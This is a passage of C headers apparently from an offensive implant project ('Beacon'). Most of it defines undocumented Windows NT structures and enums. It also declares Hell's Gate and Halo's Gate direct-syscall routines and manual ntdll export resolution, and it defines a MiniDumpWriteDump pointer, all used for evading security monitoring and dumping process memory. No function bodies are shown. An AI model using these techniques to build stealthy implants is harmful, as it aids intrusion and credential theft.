PVOID ReservedForPerf; 136 | PVOID ReservedForOle; 137 | ULONG WaitingOnLoaderLock; 138 | UCHAR Padding6[4]; 139 | PVOID SavedPriorityState; 140 | ULONG_PTR SoftPatchPtr1; 141 | ULONG_PTR ThreadPoolData; 142 | PVOID* TlsExpansionSlots; 143 | PVOID DeallocationBStore; 144 | PVOID BStoreLimit; 145 | ULONG ImpersonationLocale; 146 | ULONG IsImpersonating; 147 | PVOID NlsCache; 148 | PVOID pShimData; 149 | ULONG HeapVirtualAffinity; 150 | UCHAR Padding7[4]; 151 | HANDLE CurrentTransactionHandle; 152 | PVOID ActiveFrame; 153 | PVOID FlsData; 154 | PVOID PreferredLanguages; 155 | PVOID UserPrefLanguages; 156 | PVOID MergedPrefLanguages; 157 | ULONG MuiImpersonation; 158 | union 159 | { 160 | USHORT CrossTebFlags; 161 | struct 162 | { 163 | unsigned __int16 SpareCrossTebBits : 16; 164 | }; 165 | }; 166 | union 167 | { 168 | USHORT SameTebFlags; 169 | struct 170 | { 171 | unsigned __int16 DbgSafeThunkCall : 1; 172 | unsigned __int16 DbgInDebugPrint : 1; 173 | unsigned __int16 DbgHasFiberData : 1; 174 | unsigned 
__int16 DbgSkipThreadAttach : 1; 175 | unsigned __int16 DbgWerInShipAssertCode : 1; 176 | unsigned __int16 DbgIssuedInitialBp : 1; 177 | unsigned __int16 DbgClonedThread : 1; 178 | unsigned __int16 SpareSameTebBits : 9; 179 | }; 180 | }; 181 | PVOID TxnScopeEnterCallback; 182 | PVOID TxnScopeExitCallback; 183 | PVOID TxnScopeContext; 184 | ULONG LockCount; 185 | ULONG SpareUlong0; 186 | PVOID ResourceRetValue; 187 | } TEB, * PTEB; 188 | 189 | typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO 190 | { 191 | USHORT UniqueProcessId; 192 | USHORT CreatorBackTraceIndex; 193 | UCHAR ObjectTypeIndex; 194 | UCHAR HandleAttributes; 195 | USHORT HandleValue; 196 | PVOID Object; 197 | ULONG GrantedAccess; 198 | } SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO; 199 | 200 | typedef struct _SYSTEM_HANDLE_INFORMATION 201 | { 202 | ULONG HandleCount; 203 | SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1]; 204 | } SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION; 205 | 206 | typedef struct _OBJECT_TYPES_INFORMATION { 207 | ULONG NumberOfTypes; 208 | } OBJECT_TYPES_INFORMATION, * POBJECT_TYPES_INFORMATION; 209 | 210 | typedef enum _OBJECT_INFORMATION_CLASS { 211 | ObjectBasicInformation, 212 | ObjectNameInformation, 213 | ObjectTypeInformation, 214 | ObjectTypesInformation, 215 | ObjectHandleFlagInformation, 216 | ObjectSessionInformation, 217 | ObjectSessionObjectInformation, 218 | MaxObjectInfoClass 219 | } OBJECT_INFORMATION_CLASS; 220 | 221 | typedef struct _OBJECT_TYPE_INFORMATION { 222 | UNICODE_STRING TypeName; 223 | ULONG TotalNumberOfObjects; 224 | ULONG TotalNumberOfHandles; 225 | ULONG TotalPagedPoolUsage; 226 | ULONG TotalNonPagedPoolUsage; 227 | ULONG TotalNamePoolUsage; 228 | ULONG TotalHandleTableUsage; 229 | ULONG HighWaterNumberOfObjects; 230 | ULONG HighWaterNumberOfHandles; 231 | ULONG HighWaterPagedPoolUsage; 232 | ULONG HighWaterNonPagedPoolUsage; 233 | ULONG HighWaterNamePoolUsage; 234 | ULONG HighWaterHandleTableUsage; 235 | ULONG 
InvalidAttributes; 236 | GENERIC_MAPPING GenericMapping; 237 | ULONG ValidAccessMask; 238 | BOOLEAN SecurityRequired; 239 | BOOLEAN MaintainHandleCount; 240 | ULONG PoolType; 241 | ULONG DefaultPagedPoolCharge; 242 | ULONG DefaultNonPagedPoolCharge; 243 | } OBJECT_TYPE_INFORMATION, * POBJECT_TYPE_INFORMATION; 244 | 245 | typedef struct _OBJECT_TYPE_INFORMATION_V2 { 246 | UNICODE_STRING TypeName; 247 | ULONG TotalNumberOfObjects; 248 | ULONG TotalNumberOfHandles; 249 | ULONG TotalPagedPoolUsage; 250 | ULONG TotalNonPagedPoolUsage; 251 | ULONG TotalNamePoolUsage; 252 | ULONG TotalHandleTableUsage; 253 | ULONG HighWaterNumberOfObjects; 254 | ULONG HighWaterNumberOfHandles; 255 | ULONG HighWaterPagedPoolUsage; 256 | ULONG HighWaterNonPagedPoolUsage; 257 | ULONG HighWaterNamePoolUsage; 258 | ULONG HighWaterHandleTableUsage; 259 | ULONG InvalidAttributes; 260 | GENERIC_MAPPING GenericMapping; 261 | ULONG ValidAccessMask; 262 | BOOLEAN SecurityRequired; 263 | BOOLEAN MaintainHandleCount; 264 | UCHAR TypeIndex; 265 | CHAR ReservedByte; 266 | ULONG PoolType; 267 | ULONG DefaultPagedPoolCharge; 268 | ULONG DefaultNonPagedPoolCharge; 269 | } OBJECT_TYPE_INFORMATION_V2, * POBJECT_TYPE_INFORMATION_V2; 270 | 271 | //typedef struct _OBJECT_ATTRIBUTES { 272 | // ULONG Length; 273 | // HANDLE RootDirectory; 274 | // PUNICODE_STRING ObjectName; 275 | // ULONG Attributes; 276 | // PVOID SecurityDescriptor; 277 | // PVOID SecurityQualityOfService; 278 | //} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; 279 | 280 | typedef enum _FILE_INFORMATION_CLASS { 281 | FileDirectoryInformation = 1, 282 | FileFullDirectoryInformation, // 2 283 | FileBothDirectoryInformation, // 3 284 | FileBasicInformation, // 4 285 | FileStandardInformation, // 5 286 | FileInternalInformation, // 6 287 | FileEaInformation, // 7 288 | FileAccessInformation, // 8 289 | FileNameInformation, // 9 290 | FileRenameInformation, // 10 291 | FileLinkInformation, // 11 292 | FileNamesInformation, // 12 293 | 
FileDispositionInformation, // 13 294 | FilePositionInformation, // 14 295 | FileFullEaInformation, // 15 296 | FileModeInformation, // 16 297 | FileAlignmentInformation, // 17 298 | FileAllInformation, // 18 299 | FileAllocationInformation, // 19 300 | FileEndOfFileInformation, // 20 301 | FileAlternateNameInformation, // 21 302 | FileStreamInformation, // 22 303 | FilePipeInformation, // 23 304 | FilePipeLocalInformation, // 24 305 | FilePipeRemoteInformation, // 25 306 | FileMailslotQueryInformation, // 26 307 | FileMailslotSetInformation, // 27 308 | FileCompressionInformation, // 28 309 | FileObjectIdInformation, // 29 310 | FileCompletionInformation, // 30 311 | FileMoveClusterInformation, // 31 312 | FileQuotaInformation, // 32 313 | FileReparsePointInformation, // 33 314 | FileNetworkOpenInformation, // 34 315 | FileAttributeTagInformation, // 35 316 | FileTrackingInformation, // 36 317 | FileIdBothDirectoryInformation, // 37 318 | FileIdFullDirectoryInformation, // 38 319 | FileValidDataLengthInformation, // 39 320 | FileShortNameInformation, // 40 321 | FileIoCompletionNotificationInformation, // 41 322 | FileIoStatusBlockRangeInformation, // 42 323 | FileIoPriorityHintInformation, // 43 324 | FileSfioReserveInformation, // 44 325 | FileSfioVolumeInformation, // 45 326 | FileHardLinkInformation, // 46 327 | FileProcessIdsUsingFileInformation, // 47 328 | FileNormalizedNameInformation, // 48 329 | FileNetworkPhysicalNameInformation, // 49 330 | FileIdGlobalTxDirectoryInformation, // 50 331 | FileIsRemoteDeviceInformation, // 51 332 | FileUnusedInformation, // 52 333 | FileNumaNodeInformation, // 53 334 | FileStandardLinkInformation, // 54 335 | FileRemoteProtocolInformation, // 55 336 | 337 | // 338 | // These are special versions of these operations (defined earlier) 339 | // which can be used by kernel mode drivers only to bypass security 340 | // access checks for Rename and HardLink operations. 
These operations 341 | // are only recognized by the IOManager, a file system should never 342 | // receive these. 343 | // 344 | 345 | FileRenameInformationBypassAccessCheck, // 56 346 | FileLinkInformationBypassAccessCheck, // 57 347 | 348 | // 349 | // End of special information classes reserved for IOManager. 350 | // 351 | 352 | FileVolumeNameInformation, // 58 353 | FileIdInformation, // 59 354 | FileIdExtdDirectoryInformation, // 60 355 | FileReplaceCompletionInformation, // 61 356 | FileHardLinkFullIdInformation, // 62 357 | FileIdExtdBothDirectoryInformation, // 63 358 | FileDispositionInformationEx, // 64 359 | FileRenameInformationEx, // 65 360 | FileRenameInformationExBypassAccessCheck, // 66 361 | FileDesiredStorageClassInformation, // 67 362 | FileStatInformation, // 68 363 | FileMemoryPartitionInformation, // 69 364 | FileStatLxInformation, // 70 365 | FileCaseSensitiveInformation, // 71 366 | FileLinkInformationEx, // 72 367 | FileLinkInformationExBypassAccessCheck, // 73 368 | FileStorageReserveIdInformation, // 74 369 | FileCaseSensitiveInformationForceAccessCheck, // 75 370 | FileKnownFolderInformation, // 76 371 | 372 | FileMaximumInformation 373 | } FILE_INFORMATION_CLASS, * PFILE_INFORMATION_CLASS; 374 | 375 | typedef struct _IO_STATUS_BLOCK { 376 | union { 377 | NTSTATUS Status; 378 | PVOID Pointer; 379 | }; 380 | ULONG_PTR Information; 381 | } IO_STATUS_BLOCK, * PIO_STATUS_BLOCK; 382 | 383 | typedef const UNICODE_STRING* PCUNICODE_STRING; 384 | 385 | typedef struct _FILE_PROCESS_IDS_USING_FILE_INFORMATION 386 | { 387 | ULONG NumberOfProcessIdsInList; 388 | ULONG_PTR ProcessIdList[1]; 389 | } FILE_PROCESS_IDS_USING_FILE_INFORMATION, * PFILE_PROCESS_IDS_USING_FILE_INFORMATION; 390 | 391 | typedef struct _THREAD_PARAMETERS 392 | { 393 | int pid; 394 | wchar_t* cmdline; 395 | } THREAD_PARAMETERS; 396 | 397 | typedef NTSTATUS(NTAPI* pNtQuerySystemInformation)(ULONG SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, 
PULONG ReturnLength); 398 | typedef NTSTATUS(NTAPI* pNtQueryObject)(_In_opt_ HANDLE Handle, _In_ OBJECT_INFORMATION_CLASS ObjectInformationClass, _Out_writes_bytes_opt_(ObjectInformationLength) PVOID ObjectInformation, _In_ ULONG ObjectInformationLength, _Out_opt_ PULONG ReturnLength); 399 | typedef NTSTATUS(NTAPI* pRtlCompareUnicodeString)(_In_ PCUNICODE_STRING String1, _In_ PCUNICODE_STRING String2, _In_ BOOLEAN CaseInSensitive); 400 | typedef NTSTATUS(NTAPI* pNtCreateProcessEx)(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, HANDLE ParentProcess, ULONG Flags, HANDLE SectionHandle OPTIONAL, HANDLE DebugPort OPTIONAL, HANDLE ExceptionPort OPTIONAL, BOOLEAN InJob); 401 | typedef BOOL(WINAPI* pMiniDumpWriteDump)(HANDLE hProcess, DWORD dwPid, HANDLE hFile, int DumpType, PVOID ExceptionParam, PVOID UserStreamParam, PVOID CallbackParam); 402 | typedef NTSTATUS(NTAPI* pNtQueryInformationFile)(HANDLE FileHandle, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation, ULONG Length, FILE_INFORMATION_CLASS FileInformationClass); -------------------------------------------------------------------------------- /Beacon/GuangMing.h: -------------------------------------------------------------------------------- 1 | #define RTL_MAX_DRIVE_LETTERS 32 2 | 3 | 4 | DWORD GetSyscallNumber(char* Page,int len); 5 | extern VOID HellsGate(WORD wSystemCall); 6 | extern HellDescent(); 7 | 8 | EXTERN_C PVOID getntdll(); 9 | 10 | EXTERN_C PVOID getExportTable( 11 | IN PVOID moduleAddr 12 | ); 13 | 14 | EXTERN_C PVOID getExAddressTable( 15 | IN PVOID moduleExportTableAddr, 16 | IN PVOID moduleAddr 17 | ); 18 | 19 | EXTERN_C PVOID getExNamePointerTable( 20 | IN PVOID moduleExportTableAddr, 21 | IN PVOID moduleAddr 22 | ); 23 | 24 | EXTERN_C PVOID getExOrdinalTable( 25 | IN PVOID moduleExportTableAddr, 26 | IN PVOID moduleAddr 27 | ); 28 | 29 | EXTERN_C PVOID getApiAddr( 30 | IN DWORD apiNameStringLen, 31 | IN LPSTR apiNameString, 32 | IN PVOID 
moduleAddr, 33 | IN PVOID ExExAddressTable, 34 | IN PVOID ExNamePointerTable, 35 | IN PVOID ExOrdinalTable 36 | ); 37 | 38 | EXTERN_C DWORD findSyscallNumber( 39 | IN PVOID ntdllApiAddr 40 | ); 41 | 42 | EXTERN_C DWORD halosGate( 43 | IN PVOID ntdllApiAddr, 44 | IN WORD index 45 | ); 46 | 47 | EXTERN_C DWORD compExplorer( 48 | IN PVOID explorerWString 49 | ); 50 | 51 | typedef struct _UNICODE_STRING 52 | { 53 | USHORT Length; 54 | USHORT MaximumLength; 55 | PWSTR Buffer; 56 | } UNICODE_STRING, * PUNICODE_STRING; 57 | 58 | typedef struct _PS_ATTRIBUTE 59 | { 60 | ULONG Attribute; 61 | SIZE_T Size; 62 | union 63 | { 64 | ULONG Value; 65 | PVOID ValuePtr; 66 | } u1; 67 | PSIZE_T ReturnLength; 68 | } PS_ATTRIBUTE, * PPS_ATTRIBUTE; 69 | 70 | #define STATUS_BUFFER_TOO_SMALL 0xC0000004 71 | 72 | typedef struct _RTL_DRIVE_LETTER_CURDIR { 73 | USHORT Flags; 74 | USHORT Length; 75 | ULONG TimeStamp; 76 | UNICODE_STRING DosPath; 77 | } RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR; 78 | 79 | typedef struct _CURDIR 80 | { 81 | UNICODE_STRING DosPath; 82 | PVOID Handle; 83 | } CURDIR, * PCURDIR; 84 | 85 | 86 | typedef struct _RTL_USER_PROCESS_PARAMETERS 87 | { 88 | ULONG MaximumLength; 89 | ULONG Length; 90 | 91 | ULONG Flags; 92 | ULONG DebugFlags; 93 | 94 | HANDLE ConsoleHandle; 95 | ULONG ConsoleFlags; 96 | HANDLE StandardInput; 97 | HANDLE StandardOutput; 98 | HANDLE StandardError; 99 | 100 | CURDIR CurrentDirectory; 101 | UNICODE_STRING DllPath; 102 | UNICODE_STRING ImagePathName; 103 | UNICODE_STRING CommandLine; 104 | PVOID Environment; 105 | 106 | ULONG StartingX; 107 | ULONG StartingY; 108 | ULONG CountX; 109 | ULONG CountY; 110 | ULONG CountCharsX; 111 | ULONG CountCharsY; 112 | ULONG FillAttribute; 113 | 114 | ULONG WindowFlags; 115 | ULONG ShowWindowFlags; 116 | UNICODE_STRING WindowTitle; 117 | UNICODE_STRING DesktopInfo; 118 | UNICODE_STRING ShellInfo; 119 | UNICODE_STRING RuntimeData; 120 | RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS]; 
121 | 122 | ULONG EnvironmentSize; 123 | ULONG EnvironmentVersion; 124 | PVOID PackageDependencyData; 125 | ULONG ProcessGroupId; 126 | ULONG LoaderThreads; 127 | } RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; 128 | 129 | typedef enum _PS_CREATE_STATE 130 | { 131 | PsCreateInitialState, 132 | PsCreateFailOnFileOpen, 133 | PsCreateFailOnSectionCreate, 134 | PsCreateFailExeFormat, 135 | PsCreateFailMachineMismatch, 136 | PsCreateFailExeName, 137 | PsCreateSuccess, 138 | PsCreateMaximumStates 139 | } PS_CREATE_STATE, * PPS_CREATE_STATE; 140 | 141 | typedef struct _OBJECT_ATTRIBUTES 142 | { 143 | ULONG Length; 144 | HANDLE RootDirectory; 145 | PUNICODE_STRING ObjectName; 146 | ULONG Attributes; 147 | PVOID SecurityDescriptor; 148 | PVOID SecurityQualityOfService; 149 | } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; 150 | 151 | typedef struct _PS_CREATE_INFO 152 | { 153 | SIZE_T Size; 154 | PS_CREATE_STATE State; 155 | union 156 | { 157 | // PsCreateInitialState 158 | struct { 159 | union { 160 | ULONG InitFlags; 161 | struct { 162 | UCHAR WriteOutputOnExit : 1; 163 | UCHAR DetectManifest : 1; 164 | UCHAR IFEOSkipDebugger : 1; 165 | UCHAR IFEODoNotPropagateKeyState : 1; 166 | UCHAR SpareBits1 : 4; 167 | UCHAR SpareBits2 : 8; 168 | USHORT ProhibitedImageCharacteristics : 16; 169 | }; 170 | }; 171 | ACCESS_MASK AdditionalFileAccess; 172 | } InitState; 173 | // PsCreateFailOnSectionCreate 174 | struct { 175 | HANDLE FileHandle; 176 | } FailSection; 177 | // PsCreateFailExeFormat 178 | struct { 179 | USHORT DllCharacteristics; 180 | } ExeFormat; 181 | // PsCreateFailExeName 182 | struct { 183 | HANDLE IFEOKey; 184 | } ExeName; 185 | // PsCreateSuccess 186 | struct { 187 | union { 188 | ULONG OutputFlags; 189 | struct { 190 | UCHAR ProtectedProcess : 1; 191 | UCHAR AddressSpaceOverride : 1; 192 | UCHAR DevOverrideEnabled : 1; // from Image File Execution Options 193 | UCHAR ManifestDetected : 1; 194 | UCHAR ProtectedProcessLight : 1; 195 | UCHAR SpareBits1 : 3; 
196 | UCHAR SpareBits2 : 8; 197 | USHORT SpareBits3 : 16; 198 | }; 199 | }; 200 | HANDLE FileHandle; 201 | HANDLE SectionHandle; 202 | ULONGLONG UserProcessParametersNative; 203 | ULONG UserProcessParametersWow64; 204 | ULONG CurrentParameterFlags; 205 | ULONGLONG PebAddressNative; 206 | ULONG PebAddressWow64; 207 | ULONGLONG ManifestAddress; 208 | ULONG ManifestSize; 209 | } SuccessState; 210 | }; 211 | } PS_CREATE_INFO, * PPS_CREATE_INFO; 212 | 213 | typedef struct _PS_ATTRIBUTE_LIST 214 | { 215 | SIZE_T TotalLength; 216 | PS_ATTRIBUTE Attributes[1]; 217 | } PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST; 218 | 219 | 220 | typedef enum _KWAIT_REASON 221 | { 222 | Executive = 0, 223 | FreePage = 1, 224 | PageIn = 2, 225 | PoolAllocation = 3, 226 | DelayExecution = 4, 227 | Suspended = 5, 228 | UserRequest = 6, 229 | WrExecutive = 7, 230 | WrFreePage = 8, 231 | WrPageIn = 9, 232 | WrPoolAllocation = 10, 233 | WrDelayExecution = 11, 234 | WrSuspended = 12, 235 | WrUserRequest = 13, 236 | WrEventPair = 14, 237 | WrQueue = 15, 238 | WrLpcReceive = 16, 239 | WrLpcReply = 17, 240 | WrVirtualMemory = 18, 241 | WrPageOut = 19, 242 | WrRendezvous = 20, 243 | Spare2 = 21, 244 | Spare3 = 22, 245 | Spare4 = 23, 246 | Spare5 = 24, 247 | WrCalloutStack = 25, 248 | WrKernel = 26, 249 | WrResource = 27, 250 | WrPushLock = 28, 251 | WrMutex = 29, 252 | WrQuantumEnd = 30, 253 | WrDispatchInt = 31, 254 | WrPreempted = 32, 255 | WrYieldExecution = 33, 256 | WrFastMutex = 34, 257 | WrGuardedMutex = 35, 258 | WrRundown = 36, 259 | MaximumWaitReason = 37 260 | } KWAIT_REASON; 261 | 262 | typedef LONG KPRIORITY; 263 | 264 | typedef struct _CLIENT_ID 265 | { 266 | HANDLE UniqueProcess; 267 | HANDLE UniqueThread; 268 | } CLIENT_ID, * PCLIENT_ID; 269 | 270 | typedef struct _SYSTEM_THREAD_INFORMATION 271 | { 272 | LARGE_INTEGER KernelTime; 273 | LARGE_INTEGER UserTime; 274 | LARGE_INTEGER CreateTime; 275 | ULONG WaitTime; 276 | PVOID StartAddress; 277 | CLIENT_ID ClientId; 278 | KPRIORITY Priority; 
279 | LONG BasePriority; 280 | ULONG ContextSwitches; 281 | ULONG ThreadState; 282 | KWAIT_REASON WaitReason; 283 | } SYSTEM_THREAD_INFORMATION, * PSYSTEM_THREAD_INFORMATION; 284 | 285 | 286 | typedef struct _SYSTEM_PROCESS_INFORMATION 287 | { 288 | ULONG NextEntryOffset; 289 | ULONG NumberOfThreads; 290 | LARGE_INTEGER WorkingSetPrivateSize; // since VISTA 291 | ULONG HardFaultCount; // since WIN7 292 | ULONG NumberOfThreadsHighWatermark; // since WIN7 293 | ULONGLONG CycleTime; // since WIN7 294 | LARGE_INTEGER CreateTime; 295 | LARGE_INTEGER UserTime; 296 | LARGE_INTEGER KernelTime; 297 | UNICODE_STRING ImageName; 298 | KPRIORITY BasePriority; 299 | HANDLE UniqueProcessId; 300 | HANDLE InheritedFromUniqueProcessId; 301 | ULONG HandleCount; 302 | ULONG SessionId; 303 | ULONG_PTR UniqueProcessKey; // since VISTA (requires SystemExtendedProcessInformation) 304 | SIZE_T PeakVirtualSize; 305 | SIZE_T VirtualSize; 306 | ULONG PageFaultCount; 307 | SIZE_T PeakWorkingSetSize; 308 | SIZE_T WorkingSetSize; 309 | SIZE_T QuotaPeakPagedPoolUsage; 310 | SIZE_T QuotaPagedPoolUsage; 311 | SIZE_T QuotaPeakNonPagedPoolUsage; 312 | SIZE_T QuotaNonPagedPoolUsage; 313 | SIZE_T PagefileUsage; 314 | SIZE_T PeakPagefileUsage; 315 | SIZE_T PrivatePageCount; 316 | LARGE_INTEGER ReadOperationCount; 317 | LARGE_INTEGER WriteOperationCount; 318 | LARGE_INTEGER OtherOperationCount; 319 | LARGE_INTEGER ReadTransferCount; 320 | LARGE_INTEGER WriteTransferCount; 321 | LARGE_INTEGER OtherTransferCount; 322 | SYSTEM_THREAD_INFORMATION Threads[1]; 323 | } SYSTEM_PROCESS_INFORMATION, * PSYSTEM_PROCESS_INFORMATION; 324 | 325 | // source:http://www.microsoft.com/whdc/system/Sysinternals/MoreThan64proc.mspx 326 | // https://processhacker.sourceforge.io/doc/ntexapi_8h_source.html#l01202 327 | typedef enum _SYSTEM_INFORMATION_CLASS 328 | { 329 | SystemBasicInformation, // q: SYSTEM_BASIC_INFORMATION 330 | SystemProcessorInformation, // q: SYSTEM_PROCESSOR_INFORMATION 331 | SystemPerformanceInformation, 
// q: SYSTEM_PERFORMANCE_INFORMATION 332 | SystemTimeOfDayInformation, // q: SYSTEM_TIMEOFDAY_INFORMATION 333 | SystemPathInformation, // not implemented 334 | SystemProcessInformation, // q: SYSTEM_PROCESS_INFORMATION 335 | SystemCallCountInformation, // q: SYSTEM_CALL_COUNT_INFORMATION 336 | SystemDeviceInformation, // q: SYSTEM_DEVICE_INFORMATION 337 | SystemProcessorPerformanceInformation, // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION 338 | SystemFlagsInformation, // q: SYSTEM_FLAGS_INFORMATION 339 | SystemCallTimeInformation, // 10, not implemented 340 | SystemModuleInformation, // q: RTL_PROCESS_MODULES 341 | SystemLocksInformation, 342 | SystemStackTraceInformation, 343 | SystemPagedPoolInformation, // not implemented 344 | SystemNonPagedPoolInformation, // not implemented 345 | SystemHandleInformation, // q: SYSTEM_HANDLE_INFORMATION 346 | SystemObjectInformation, // q: SYSTEM_OBJECTTYPE_INFORMATION mixed with SYSTEM_OBJECT_INFORMATION 347 | SystemPageFileInformation, // q: SYSTEM_PAGEFILE_INFORMATION 348 | SystemVdmInstemulInformation, // q 349 | SystemVdmBopInformation, // 20, not implemented 350 | SystemFileCacheInformation, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemCache) 351 | SystemPoolTagInformation, // q: SYSTEM_POOLTAG_INFORMATION 352 | SystemInterruptInformation, // q: SYSTEM_INTERRUPT_INFORMATION 353 | SystemDpcBehaviorInformation, // q: SYSTEM_DPC_BEHAVIOR_INFORMATION; s: SYSTEM_DPC_BEHAVIOR_INFORMATION (requires SeLoadDriverPrivilege) 354 | SystemFullMemoryInformation, // not implemented 355 | SystemLoadGdiDriverInformation, // s (kernel-mode only) 356 | SystemUnloadGdiDriverInformation, // s (kernel-mode only) 357 | SystemTimeAdjustmentInformation, // q: SYSTEM_QUERY_TIME_ADJUST_INFORMATION; s: SYSTEM_SET_TIME_ADJUST_INFORMATION (requires SeSystemtimePrivilege) 358 | SystemSummaryMemoryInformation, // not implemented 359 | SystemMirrorMemoryInformation, // 30, s (requires license 
value "Kernel-MemoryMirroringSupported") (requires SeShutdownPrivilege) 360 | SystemPerformanceTraceInformation, // s 361 | SystemObsolete0, // not implemented 362 | SystemExceptionInformation, // q: SYSTEM_EXCEPTION_INFORMATION 363 | SystemCrashDumpStateInformation, // s (requires SeDebugPrivilege) 364 | SystemKernelDebuggerInformation, // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION 365 | SystemContextSwitchInformation, // q: SYSTEM_CONTEXT_SWITCH_INFORMATION 366 | SystemRegistryQuotaInformation, // q: SYSTEM_REGISTRY_QUOTA_INFORMATION; s (requires SeIncreaseQuotaPrivilege) 367 | SystemExtendServiceTableInformation, // s (requires SeLoadDriverPrivilege) // loads win32k only 368 | SystemPrioritySeperation, // s (requires SeTcbPrivilege) 369 | SystemVerifierAddDriverInformation, // 40, s (requires SeDebugPrivilege) 370 | SystemVerifierRemoveDriverInformation, // s (requires SeDebugPrivilege) 371 | SystemProcessorIdleInformation, // q: SYSTEM_PROCESSOR_IDLE_INFORMATION 372 | SystemLegacyDriverInformation, // q: SYSTEM_LEGACY_DRIVER_INFORMATION 373 | SystemCurrentTimeZoneInformation, // q 374 | SystemLookasideInformation, // q: SYSTEM_LOOKASIDE_INFORMATION 375 | SystemTimeSlipNotification, // s (requires SeSystemtimePrivilege) 376 | SystemSessionCreate, // not implemented 377 | SystemSessionDetach, // not implemented 378 | SystemSessionInformation, // not implemented 379 | SystemRangeStartInformation, // 50, q 380 | SystemVerifierInformation, // q: SYSTEM_VERIFIER_INFORMATION; s (requires SeDebugPrivilege) 381 | SystemVerifierThunkExtend, // s (kernel-mode only) 382 | SystemSessionProcessInformation, // q: SYSTEM_SESSION_PROCESS_INFORMATION 383 | SystemLoadGdiDriverInSystemSpace, // s (kernel-mode only) (same as SystemLoadGdiDriverInformation) 384 | SystemNumaProcessorMap, // q 385 | SystemPrefetcherInformation, // q: PREFETCHER_INFORMATION; s: PREFETCHER_INFORMATION // PfSnQueryPrefetcherInformation 386 | SystemExtendedProcessInformation, // q: SYSTEM_PROCESS_INFORMATION 
387 | SystemRecommendedSharedDataAlignment, // q 388 | SystemComPlusPackage, // q; s 389 | SystemNumaAvailableMemory, // 60 390 | SystemProcessorPowerInformation, // q: SYSTEM_PROCESSOR_POWER_INFORMATION 391 | SystemEmulationBasicInformation, // q 392 | SystemEmulationProcessorInformation, 393 | SystemExtendedHandleInformation, // q: SYSTEM_HANDLE_INFORMATION_EX 394 | SystemLostDelayedWriteInformation, // q: ULONG 395 | SystemBigPoolInformation, // q: SYSTEM_BIGPOOL_INFORMATION 396 | SystemSessionPoolTagInformation, // q: SYSTEM_SESSION_POOLTAG_INFORMATION 397 | SystemSessionMappedViewInformation, // q: SYSTEM_SESSION_MAPPED_VIEW_INFORMATION 398 | SystemHotpatchInformation, // q; s 399 | SystemObjectSecurityMode, // 70, q 400 | SystemWatchdogTimerHandler, // s (kernel-mode only) 401 | SystemWatchdogTimerInformation, // q (kernel-mode only); s (kernel-mode only) 402 | SystemLogicalProcessorInformation, // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION 403 | SystemWow64SharedInformationObsolete, // not implemented 404 | SystemRegisterFirmwareTableInformationHandler, // s (kernel-mode only) 405 | SystemFirmwareTableInformation, // not implemented 406 | SystemModuleInformationEx, // q: RTL_PROCESS_MODULE_INFORMATION_EX 407 | SystemVerifierTriageInformation, // not implemented 408 | SystemSuperfetchInformation, // q: SUPERFETCH_INFORMATION; s: SUPERFETCH_INFORMATION // PfQuerySuperfetchInformation 409 | SystemMemoryListInformation, // 80, q: SYSTEM_MEMORY_LIST_INFORMATION; s: SYSTEM_MEMORY_LIST_COMMAND (requires SeProfileSingleProcessPrivilege) 410 | SystemFileCacheInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (same as SystemFileCacheInformation) 411 | SystemThreadPriorityClientIdInformation, // s: SYSTEM_THREAD_CID_PRIORITY_INFORMATION (requires SeIncreaseBasePriorityPrivilege) 412 | SystemProcessorIdleCycleTimeInformation, // q: SYSTEM_PROCESSOR_IDLE_CYCLE_TIME_INFORMATION[] 413 | SystemVerifierCancellationInformation, // not 
implemented // name:wow64:whNT32QuerySystemVerifierCancellationInformation 414 | SystemProcessorPowerInformationEx, // not implemented 415 | SystemRefTraceInformation, // q; s // ObQueryRefTraceInformation 416 | SystemSpecialPoolInformation, // q; s (requires SeDebugPrivilege) // MmSpecialPoolTag, then MmSpecialPoolCatchOverruns != 0 417 | SystemProcessIdInformation, // q: SYSTEM_PROCESS_ID_INFORMATION 418 | SystemErrorPortInformation, // s (requires SeTcbPrivilege) 419 | SystemBootEnvironmentInformation, // 90, q: SYSTEM_BOOT_ENVIRONMENT_INFORMATION 420 | SystemHypervisorInformation, // q; s (kernel-mode only) 421 | SystemVerifierInformationEx, // q; s 422 | SystemTimeZoneInformation, // s (requires SeTimeZonePrivilege) 423 | SystemImageFileExecutionOptionsInformation, // s: SYSTEM_IMAGE_FILE_EXECUTION_OPTIONS_INFORMATION (requires SeTcbPrivilege) 424 | SystemCoverageInformation, // q; s // name:wow64:whNT32QuerySystemCoverageInformation; ExpCovQueryInformation 425 | SystemPrefetchPatchInformation, // not implemented 426 | SystemVerifierFaultsInformation, // s (requires SeDebugPrivilege) 427 | SystemSystemPartitionInformation, // q: SYSTEM_SYSTEM_PARTITION_INFORMATION 428 | SystemSystemDiskInformation, // q: SYSTEM_SYSTEM_DISK_INFORMATION 429 | SystemProcessorPerformanceDistribution, // 100, q: SYSTEM_PROCESSOR_PERFORMANCE_DISTRIBUTION 430 | SystemNumaProximityNodeInformation, // q 431 | SystemDynamicTimeZoneInformation, // q; s (requires SeTimeZonePrivilege) 432 | SystemCodeIntegrityInformation, // q // SeCodeIntegrityQueryInformation 433 | SystemProcessorMicrocodeUpdateInformation, // s 434 | SystemProcessorBrandString, // q // HaliQuerySystemInformation -> HalpGetProcessorBrandString, info class 23 435 | 